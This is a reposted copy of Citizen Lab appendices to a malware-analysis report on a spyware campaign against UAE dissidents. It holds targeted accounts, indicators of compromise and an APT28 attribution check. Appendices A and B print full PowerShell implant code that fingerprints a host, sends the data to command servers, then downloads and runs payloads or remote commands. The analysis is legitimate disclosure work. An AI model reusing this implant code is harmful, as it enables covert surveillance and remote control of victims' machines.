Sunday, May 29, 2016

Feedly:Publications - The Citizen Lab. Keep Calm and (Don’t) Enable Macros: Appendices



from Publications - The Citizen Lab

Appendices

See our original report here.

Appendix A: Stage One PowerShell Command

try
{
    $path = "%temp%"
    $url = "http://ift.tt/1qVME9f;
    $extension = "ps1"

    $guid = (get-wmiobject win32_computersystemproduct).UUID

    $tmp = get-wmiobject win32_operatingsystem
    $osinfo = "{"
    $osinfo = $osinfo + '"systemdirectory":"'+$tmp.systemdirectory+'",'
    $osinfo = $osinfo + '"buildnumber":"'+$tmp.buildnumber+'",'
    $osinfo = $osinfo + '"registereduser":"'+$tmp.registereduser+'",'
    $osinfo = $osinfo + '"serialnumber":"'+$tmp.serialnumber+'",'
    $osinfo = $osinfo + '"version":"'+$tmp.version+'"'
    $osinfo = $osinfo + "}"

    $tmp = get-wmiobject win32_computersystem
    $sysinfo = "{"
    $sysinfo = $sysinfo + '"manufacturer":"'+$tmp.manufacturer+'",'
    $sysinfo = $sysinfo + '"model":"'+$tmp.model+'",'
    $sysinfo = $sysinfo + '"name":"'+$tmp.name+'",'
    $sysinfo = $sysinfo + '"primaryownername":"'+$tmp.primaryownername+'",'
    $sysinfo = $sysinfo + '"totalphysicalmemory":"'+$tmp.totalphysicalmemory+'"'
    $sysinfo = $sysinfo + "}"

    $dotnet_array = get-childitem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | get-itemproperty -name version -EA 0 | where {$_.pschildname -match '^(?!S)\p{L}'}
    for ($i=0; $i -lt $dotnet_array.length; $i++){$dotnet = $dotnet + '"'+$dotnet_array[$i].Version+'",'}
    $dotnet = '[' + $dotnet.substring(0, $dotnet.length-1) + ']'

    $info = '{'
    $info = $info + '"guid":"'+$guid+'",'
    $info = $info + '"osinfo":'+$osinfo+','
    $info = $info + '"sysinfo":'+$sysinfo+','
    $info = $info + '"dotnet":'+$dotnet+''
    $info = $info + '}'
    $info_64 = [system.convert]::tobase64string([system.text.encoding]::unicode.getbytes($info))

    # send, receive
    $client = new-object system.net.webclient
    $data = $client.downloadstring("$url/?info=$info_64")

    if([string]::IsNullOrEmpty($data)){exit}

    # drop
    $abspath = [system.environment]::expandenvironmentvariables($path) + "\$guid.$extension"
    [io.file]::writeallbytes($abspath, [convert]::frombase64string($data))

    # execute
    iex $abspath
} catch {}

 

Appendix B: Stage Two PowerShell Command

$QvF=""
$OCs="9026ef20"
$SLlWfL="RaH80/bk5xhNn4bISBUTPQ=="
$mxExBh="$ENV:Temp\IEWebCache.vbs"
function UwDSkX{
try{add-type $tWRv}catch{}
$script:SLlWfL=[system.convert]::frombase64string($SLlWfL)
$script:QvF=(get-wmiobject win32_computersystemproduct).UUID.substring(0,8)
while($true){
try{
$kcLJjB=tYRy([RC4]::Crypt([system.text.encoding]::utf8.getbytes('&'),$SLlWfL))
if($kcLJjB){
$yDotaj=[RC4]::Crypt($kcLJjB,$SLlWfL)
$yDotaj=[system.text.encoding]::utf8.getstring($yDotaj)
try{
foreach($MpkgwL in $yDotaj -split "&&&"){
$gZb=""
$wQD=$false
$rNlvFz=$MpkgwL -split "&&"
$gZb += "`"ci`":`"$([string]$rNlvFz[0])`""
$gZb += ",`"t`":`"$([string]$rNlvFz[1])`""
switch($rNlvFz[1]){
"9"{
schtasks /end /tn `"IE Web Cache`" | out-null
schtasks /delete /f /tn `"IE Web Cache`" | out-null
remove-item $mxExBh
$gZb += ",`"c`":0"
$wQD=$true
}
default{
$VAMR=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($rNlvFz[2]))
$WLpyjj=iex($VAMR)
$gZb += ",`"c`":`"$WLpyjj`""
}
}
$Nni=[RC4]::Crypt([system.text.encoding]::utf8.getbytes($gZb),$SLlWfL)
tYRy($Nni)
if($wQD){exit}
}
}catch{
try{
$gZb += ",`"ec`":`"$([string]$lastexitcode)`""
$gZb += ",`"c`":`"$($_.exception.message)`""
tYRy([RC4]::Crypt([system.text.encoding]::utf8.getbytes($gZb), $SLlWfL))
}catch{
}
}
}
}catch{}
Start-Sleep -s 600
}
}
function tYRy($hxWR){
$eVFXy=$null
$HXWL=New-Object -ComObject "Msxml2.ServerXMLHTTP.6.0"
$HXWL.open('POST',"http://ift.tt/1NXuZJs)
$HXWL.setrequestheader("Content-length",$hxWR.length)
$HXWL.setrequestheader("User-Agent", "Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)")
$HXWL.setrequestheader("Connection","close")
$HXWL.setoption(2,13056)
$HXWL.send("$OCs$QvF" + [system.convert]::tobase64string($hxWR))
$eVFXy=$HXWL.responsebody
return $eVFXy
}
$tWRv = @"
using System.Text;
public static class RC4{
=ZZ
byte[] inbytes=input;
byte[] result=new byte[inbytes.Length];
int x, y, j=0;
int[] box=new int[256];
for (int i=0; i < 256; i++){box[i]=i;}
for (int i=0; i < 256; i++){
j=((char)key[i % key.Length] + box[i] + j) % 256;
x=box[i];
box[i]=box[j];
box[j]=x;
}
x=0;
y=0;
for(int i = 0; i < inbytes.Length; i++){
x=(x + 1) % 256;
y=(y + box[x]) % 256;
j=box[x];
box[x]=box[y];
box[y]=j;
result[i]=(byte)(inbytes[i] ^ box[(box[x] + box[y]) % 256]);
}
return result;
}
}
"@
try{
$aTKs=new-object -typename system.threading.mutex -argumentlist $false, "Global\YZi"
if($aTKs.waitone(100)){UwDSkX}
}finally{try{$aTKs.releasemutex()}catch{}}

 

Appendix C: JavaScript Profiling File

Due to its large size, this appendix is available in an external Google Document:
http://ift.tt/1qVMoXM

 

Appendix D: Public Stealth Falcon Tweets

Attacker Victim Link
@Bu_saeed2 @Kh_OZ http://twitter.com/Bu_saeed2/status/156781983983349760
@Bu_saeed2 @saalaam25 http://twitter.com/Bu_saeed2/status/158272650995695616
@Bu_saeed2 @alshamsi789 http://twitter.com/Bu_saeed2/status/156785619744473088
@Bu_saeed2 @BdrBakalla http://twitter.com/Bu_saeed2/status/156406670866653184
@Bu_saeed2 @omran83 http://twitter.com/Bu_saeed2/status/158267593269063680
@Bu_saeed2 @abu_sa33d https://twitter.com/Bu_saeed2/status/158269006451707904
@islam_way_2030 @Morsyuae http://twitter.com/islam_way_2030/status/212563401761755137
@islam_way_2030 @WeldBudhabi https://twitter.com/islam_way_2030/status/232392466760863744
@islam_way_2030 @Rmadanhom https://twitter.com/islam_way_2030/status/232392808336588800
@islam_way_2030 @intihakat https://twitter.com/islam_way_2030/status/232393358243401728
@islam_way_2030 @bomsabih https://twitter.com/islam_way_2030/status/232394930285318144
@islam_way_2030 @hwghp https://twitter.com/islam_way_2030/status/232395293449146368
@um_zainab123 @haalreem http://twitter.com/um_zainab123/status/255210220907802624
@um_zainab123 @alsalam45 http://twitter.com/um_zainab123/status/255230862914899969
@1a1_ahmed @magdy_masood1 http://twitter.com/1a1_ahmed/status/367590431762051072
@MiriamKhaled @uaelionheart http://twitter.com/MiriamKhaled/status/156804441436205056
@MiriamKhaled @uaepolitician http://twitter.com/MiriamKhaled/status/156795446910664704
@MiriamKhaled @bosalim77 http://twitter.com/MiriamKhaled/status/156756400108867584
@MiriamKhaled @zayedson7 http://twitter.com/MiriamKhaled/status/156803937482190848
@MiriamKhaled @71uae https://twitter.com/MiriamKhaled/status/156625204280434688
@JJory22 @helalsalem11 https://twitter.com/JJory22/status/159144594574020608
@pooruae @2011national https://twitter.com/pooruae/status/156766408137646080
@pooruae @youae_dxb https://twitter.com/pooruae/status/156766841702854657
@r7aluae2 @newbedon https://twitter.com/r7aluae2/status/156418043424157696

Additional Details

  • @saalaam25 was targeted on 14 January 2012.  The account stopped tweeting on 5 December 2014.  The account tweeted about political issues in the UAE.
    • @alshamsi789 was targeted on 10 January 2012.  The account is still active, and tweets about political issues in the UAE.
      • @BdrBakalla was targeted on 9 January 2012.  The account is still active, and gives its location as “Abu Dhabi.”
        • @morsyuae was targeted on 12 June 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.
          • @HaAlReem was targeted on 7 October 2012.  The account stopped tweeting on 17 August 2013.  The account appeared to tweet in solidarity with political prisoners in the UAE.
            • @alsalam45 was targeted on 7 October 2012.  The account stopped tweeting on 13 August 2015.  The account appeared to tweet in solidarity with political prisoners in the UAE.
              • @magdy_masood1 was targeted on 14 August 2013.  The account stopped tweeting on 30 July 2014.  The account appeared to tweet about Gaza, and against Egyptian President Sisi.
              • @UAELionHeart was targeted on 10 January 2012.  The account stopped tweeting on 30 June 2013.  The account appeared to tweet in solidarity with political prisoners in the UAE.
                • @uaepolitician was targeted on 10 January 2012.  The account appears to no longer exist.
                  • @bosalim77 was targeted on 10 January 2012.  The account is currently suspended.
                  • @ZayedSon7 was targeted on 10 January 2012.  The account appears to no longer exist.
                  • @helalsalem11 was targeted on 16 January 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.
                  • @2011national, now renamed to @2013national, was targeted on 10 January 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.
                  • @abu_sa33d was targeted on 14 January 2012.  The account is still active, and appears to tweet both Jihadi content, and solidarity with political prisoners in the UAE.
                  • @YouAE_Dxb was targeted on 10 January 2012.  The account appears to no longer exist.
                  • @hwghp was targeted on 5 August 2012.  The account is still active, and describes itself as “in solidarity with the UAE detainees.”  The account appears to tweet in solidarity with political prisoners in the UAE.
                  • @Rmadanhom, now renamed to @Duaamadloom, was targeted on 5 August 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.
                  •  

                    Appendix E: Results of aax.me Scan

                    Due to its large size, this appendix is available in an external Google Sheet:

                    http://ift.tt/1NXvfrS

                     

                    Appendix F: Indicators of Targeting

                    Domains (Attack on Donaghy)

                    aax.me
                    adhostingcache.com
                    adhostingcaches.com
                    incapsulawebcache.com

                    IPs (Attack on Donaghy)

                    83.125.20.162
                    87.120.37.83
                    95.215.44.37

                    Stage One C2 Server IP Addresses

                    103.208.86.23
                    131.72.136.224
                    185.62.188.163
                    185.86.148.245
                    193.105.134.244
                    37.59.138.119
                    45.125.244.196
                    46.183.221.240
                    87.121.52.96
                    91.219.237.142
                    94.242.202.168
                    95.183.50.230
                    95.183.51.164
                    95.183.51.32

                    Stage One C2 Server Domains

                    adlinkmetric.com
                    adlinkmetrics.com
                    bestairlinepricetags.com
                    clickstatistic.com
                    fasttravelclearance.com
                    optimizedimghosting.com
                    rapidlinkhit.com
                    safeadspace.com
                    simpleadbanners.com
                    tinyimagehosting.com
                    windowshealthcheck.com

                    Stage Two C2 Server IP Addresses

                    103.193.4.112
                    107.181.128.99
                    151.80.141.155
                    151.80.158.81
                    151.80.95.42
                    158.69.3.165
                    178.17.170.106
                    178.17.170.183
                    178.17.171.104
                    178.17.171.234
                    178.17.174.21
                    185.112.82.4
                    185.117.73.169
                    185.141.25.225
                    185.24.233.110
                    185.24.233.202
                    185.24.234.15
                    185.61.148.176
                    185.61.148.85
                    185.61.149.2
                    185.62.190.127
                    185.77.129.103
                    185.86.148.46
                    185.86.148.55
                    185.86.149.116
                    185.99.132.210
                    188.0.236.83
                    188.165.80.78
                    190.10.10.189
                    190.123.45.141
                    190.123.45.147
                    193.105.134.10
                    193.105.134.13
                    198.50.177.201
                    199.201.121.148
                    200.122.181.117
                    212.56.214.42
                    37.59.122.150
                    37.59.138.117
                    46.183.219.81
                    46.183.221.187
                    46.183.221.230
                    46.183.221.244
                    5.149.252.143
                    5.154.190.120
                    5.154.190.159
                    5.9.173.181
                    78.46.254.161
                    84.200.16.63
                    87.120.37.83
                    87.121.52.95
                    91.216.245.56
                    91.236.116.210
                    91.236.116.44
                    92.222.66.2
                    93.174.88.206
                    94.102.56.140
                    94.102.56.141
                    94.23.183.9
                    94.242.232.13
                    95.183.50.53
                    95.183.51.133
                    95.183.51.21
                    95.183.53.191
                    95.215.44.165
                    95.215.44.2
                    95.215.44.207

                    Stage Two C2 Server IP Addresses (Historical)

                    119.18.57.236
                    119.18.58.26
                    124.217.246.199
                    136.243.250.168
                    178.17.170.102
                    178.17.171.173
                    185.45.192.136
                    185.62.188.138
                    185.62.189.16
                    190.10.9.219
                    192.71.218.164
                    198.105.120.51
                    198.105.122.70
                    198.105.125.32
                    199.127.226.243
                    199.201.121.144
                    31.220.43.237
                    46.19.141.188
                    46.19.143.233
                    46.28.202.130
                    46.28.202.93
                    5.1.88.170
                    5.196.140.50
                    5.199.171.40
                    5.199.171.61
                    87.117.255.177
                    87.121.52.170
                    93.174.88.198
                    95.183.49.134
                    95.215.44.251

                    Stage Two C2 Server Domains

                    adobereaderupdater.com
                    airlineadverts.com
                    akamai-host-network.com
                    akamai-hosting-network.com
                    akamaicachecdn.com
                    akamaicloud.net
                    akamaicss.com
                    akamaihostcdn.net
                    akamaiwebcache.com
                    appleimagecache.com
                    burst-media.com
                    cachecontent.com
                    cdn-logichosting.com
                    cdnimagescache.com
                    chromeupdater.com
                    cloudburstcdn.net
                    cloudburstercdn.net
                    cloudimagecdn.com
                    cloudimagehosters.com
                    contenthosts.com
                    contenthosts.net
                    dnsclienthelper.com
                    dnsclientresolver.com
                    domainimagehost.com
                    dotnetupdatechecker.com
                    dotnetupdates.com
                    dropboxsyncservice.com
                    edgecacheimagehosting.com
                    flashplayersupdates.com
                    flashplayerupdater.com
                    iesafebrowsingcache.com
                    iesaferbrowsingcache.com
                    javaupdatecache.com
                    javaupdatersvc.com
                    javaupdatescache.com
                    javaupdatesvc.com
                    limelightimagecache.com
                    livewebcache.com
                    media-providers.net
                    mediacachecdn.com
                    mediacachecdn.net
                    mediacloudsolution.com
                    mediacloudsolutions.net
                    mediaimagecache.com
                    mediaproviders.net
                    ministrynewschannel.com
                    ministrynewsinfo.com
                    msofficesso.com
                    msofficeupdates.com
                    mswindowsupdater.com
                    netassistcache.com
                    netcloudcdn.com
                    optimizercache.com
                    oraclejavaupdate.com
                    oraclejavaupdater.com
                    printspoolerservices.com
                    safeadvertimgs.com
                    webanalyticstats.com
                    wincertificateupdater.com
                    winconnectors.com
                    windefenderupdater.com
                    windowsconnector.com
                    windowsdefenderupdater.com
                    windowsearchcache.com
                    windowspatchmanager.com
                    windowssearchcache.com
                    windowsupdatecache.com
                    windowsupdatescache.com

                    Related Domains

                    amnkeysvc.com
                    amnkeysvcs.com
                    scheduledupdater.com
                    yeastarr.com

                    Suspected Attack Domains

                    velocityfiles.com
                    call4uaefreedom.com
                    uaefreedom.com (on or after October 7, 2012)
                    a7rarelemarat.com
                    al7ruae2014.com

                    Social Media or Email Accounts

                    the_right_to_fight@openmailbox.org
                    andrew.dwight389@outlook.com
                    @a7rarelemarat
                    @islam_way_2030
                    @bu_saeed2
                    @um_zainab123
                    @1a1_ahmed
                    @miriamkhaled
                    @JJory22
                    @pooruae
                    @r7aluae2
                    @Dwight389

                    Related Social Media Accounts

                    @al7ruae2014 (Instagram)
                    @FreeUAE2012

                     

                    Appendix G: No Evidence of APT28 Connection

                    Five (or six) of the domains we linked to our operator were registered using anonymousbitcoindomains[.]com (ABCD), a now-defunct “anonymous” registration service that accepted payment in Bitcoin, through which it appears that only about 89 domains were ever registered (all between 2014-07-09 and 2015-04-30).

                    The service touted the small amount of information collected from its users:

                    “You don’t need to create an account when you buy a hot dog in the streets, do you? Neither should you when you want to register a domain name. Just like the hot dog sales dude, we validate the money you pay with. And if that’s good, then we’re happy to sell you a domain name!”

                    There appears to be belief in the security community that a significant amount of ABCD activity involved a group known as APT28.  APT28 is said to be supported by the Russian Government,1 and has targeted “NATO, governments of Russia’s neighbors, and U.S. defense contractors”.2  For instance, PwC Threat Intelligence lists one of the domain names we believe is related to our operator, netassistcache.com, as an APT28 domain.  Though the attacks we profile in this report do not appear to align with known APT28 objectives, and the malware sent to Donaghy does not relate to known APT28 malware, we nevertheless feel compelled to examine whether our operator may be related to APT28.  We outline our research below; we do not find any strong indications to suggest that our operator is related to APT28.

                    A Comparison of Registration Dates

                    Below, we list the five ABCD domains we linked to our operator, and a sixth ABCD domain that we believe may belong to our operator:

                    ABCD Domain Registration Date
                    windowsearchcache.com 2014-11-13
                    adhostingcache.com 2014-12-01
                    netassistcache.com 2015-02-25
                    mediacloudsolution.com 2015-03-05
                    al7ruae2014.com (possible) 2015-03-05
                    contenthosts.net 2015-03-08

                    We noted that several APT28 domains were registered on 2015-03-05, the same day as one of our operator’s domains (and a second domain that may belong to our operator):

                    al7ruae2014[.]com (possibly our operator)
                    defencereview[.]net
                    intelnetservice[.]com (APT28)3
                    intelsupport[.]net (APT28)4
                    mediacloudsolution[.]com (our operator)
                    microsoftdriver[.]com (APT28)5
                    nato-int[.]com
                    osce-military[.]org
                    windowsappstore[.]net (APT28)6

                    However, there is no further evidence that the APT28 domains are related to our operator’s domains (e.g., there is no overlap in passive DNS).

                    A “suspension” of ABCD domains

                    On 2 July 2015, the DNS entries for at least 21 domain names registered via ABCD were updated to IP address 109.71.51.58, according to passive DNS data.  Six of these domain names appear to be directly related to APT28, via public information (microsoftdriver.com and windowsappstore.net appear in an APT28 sample,7 dailyforeignnews.com was documented distributing APT28 malware,8 and diplomatnews.org, worldpoliticsnews.org, and uz-news.org were documented hosting the APT28 exploit kit).9

                    The Internet Archive records that microsoftdriver.com returned an apparently nonstandard “Notice: Suspended domain” page 12 days after the transfer on 14 July 2015.10  We also identified another ABCD domain, bagacamesmo.biz, which was redirected to 109.71.51.58 on 9/23/2014.  Five days later, the Internet Archive records that it displayed a substantially similar notice of domain suspension, except it suggested the suspension was in relation to the “FraudWatch International Security Operations Centre”.11  The reference to FraudWatch appears to be a reference to the eponymous provider of brand-protection services, including website takedown services.12  The Internet Archive records that the suspension message on bagacamesmo.biz was later updated to the same message as the one on microsoftdriver.com.13  The only other instance we found of an ABCD domain whose DNS was changed to 109.71.51.58 was policeoracle.org, which was changed on 18 April 2015.  We note that the “Last-Modified” header for microsoftdriver.com reads 17 April 2015.

                    Therefore, our hypothesis is that ABCD controls 109.71.51.58.  When they conducted what appears to be their first domain “suspension” (bagacamesmo.biz, perhaps upon request from FraudWatch), they created a custom suspension page indicating this.  Perhaps their second domain “suspension” (policeoracle.org) was on request from a different party, therefore they updated their page to delete the reference to FraudWatch.

                    One of the at least 21 domain names suspended in this manner on 2 July 2015 was windowsearchcache.com.  However, the domain appears to have been “un-suspended” on 22 July 2014, in that its DNS entry before the suspension was restored.  It is the only ABCD domain name we were able to identify that was suspended and then un-suspended.  It was also the only suspended ABCD domain name that we were able to trace to our operator.  We are not sure which party requested the suspension, and why ABCD decided to “un-suspend” windowsearchcache.com.

                    We are unaware of any evidence linking APT28 to windowsearchcache.com.  That windowsearchcache.com appears to be the only un-suspended ABCD domain (and the only one we claim is not APT28), suggest that it may be unrelated to APT28 activity.

                     

                    Footnotes

                    1 http://ift.tt/1xVcUAR
                    2 http://ift.tt/1dIAYzU
                    3 http://ift.tt/21BbU3g
                    4 http://ift.tt/21BbU3g
                    5 http://ift.tt/1qVMnmL
                    6 http://ift.tt/1qVMnmL
                    7 http://ift.tt/1qVMnmL
                    8 http://ift.tt/1EQz3GC
                    9 http://ift.tt/1qVMYEM
                    10 http://ift.tt/1NXvbbL
                    11 http://ift.tt/1qVMfni
                    12 http://ift.tt/1NXv9AG
                    13 http://ift.tt/1qVM4YX

                    The post Keep Calm and (Don’t) Enable Macros: Appendices appeared first on The Citizen Lab.

Web Analytics